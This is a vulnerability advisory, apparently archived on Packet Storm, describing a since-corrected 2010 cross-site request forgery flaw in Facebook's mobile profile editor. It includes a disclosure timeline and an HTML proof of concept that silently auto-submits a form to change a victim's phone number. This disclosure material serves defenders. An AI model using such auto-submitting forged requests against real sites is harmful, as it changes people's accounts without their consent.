exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Facebook Cross Site Request Forgery

Facebook Cross Site Request Forgery
Posted Feb 12, 2010
Authored by Juan Galiana Lara

Facebook suffered from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 7c06005a85f096900d92826ed406c9ce0ea87835034029bd142b1096a149b394

Facebook Cross Site Request Forgery

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2010-002
- Original release date: February 2nd, 2010
- Last revised: February 12th, 2010
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Facebook Cross-Site Request Forgery vulnerability

II. BACKGROUND
-------------------------
Facebook is a social networking website that is operated and privately
owned by Facebook, Inc. Users can add friends and send them messages,
and update their personal profiles to notify friends about themselves.
Additionally, users can join networks organized by city, workplace,
school, and region. The website's name stems from the colloquial name
of books given at the start of the academic year by university
administrations with the intention of helping students to get to know
each other better.

III. DESCRIPTION
-------------------------
The mobile interface of Facebook social network is affected by
Cross-Site Request Forgery (CSRF) vulnerability.
The CSRF is due resource http://m.facebook.com/a/editprofile.php is
not properly protected with a token when attempting to update some
variables like phone_cell or phone_other. An attacker can force a user
to perform actions on Facebook, changing its profile in an
unauthorized manner.

IV. PROOF OF CONCEPT
-------------------------
CSRF POC:

<html>
<head>
<script>
function send() {
document.forms[0].submit();
}
</script>
</head>

<body onload="send();">
<form
action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact"
method="post">
<input type="hidden" name="phone_num" value="600000000">
<input type="hidden" name="save" value="">
</form>
</body>
</html>

other variables are affected, like phone_num and phone_ext when edit
has the value phone_other.

V. BUSINESS IMPACT
-------------------------
An attacker can force an end user to execute unwanted actions on
Facebook. Successful exploitation of proof of concept allows to update
data of the victim profile.

VI. SYSTEMS AFFECTED
-------------------------
Facebook

VII. SOLUTION
-------------------------
Corrected.

VIII. REFERENCES
-------------------------
http://www.facebook.com
http://www.isecauditors.com
http://juangaliana.blogspot.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
February 2, 2010: Initial release.
February 10, 2010: Last review.

XI. DISCLOSURE TIMELINE
-------------------------
February 2, 2010: Discovered by Internet Security Auditors.
February 3, 2010: Vendor contacted.
February 4, 2010: Response: under review.
February 9, 2010: Corrected.
February 10, 2010: Request status. Reponse: correction in progress.
February 12, 2010: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    16 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close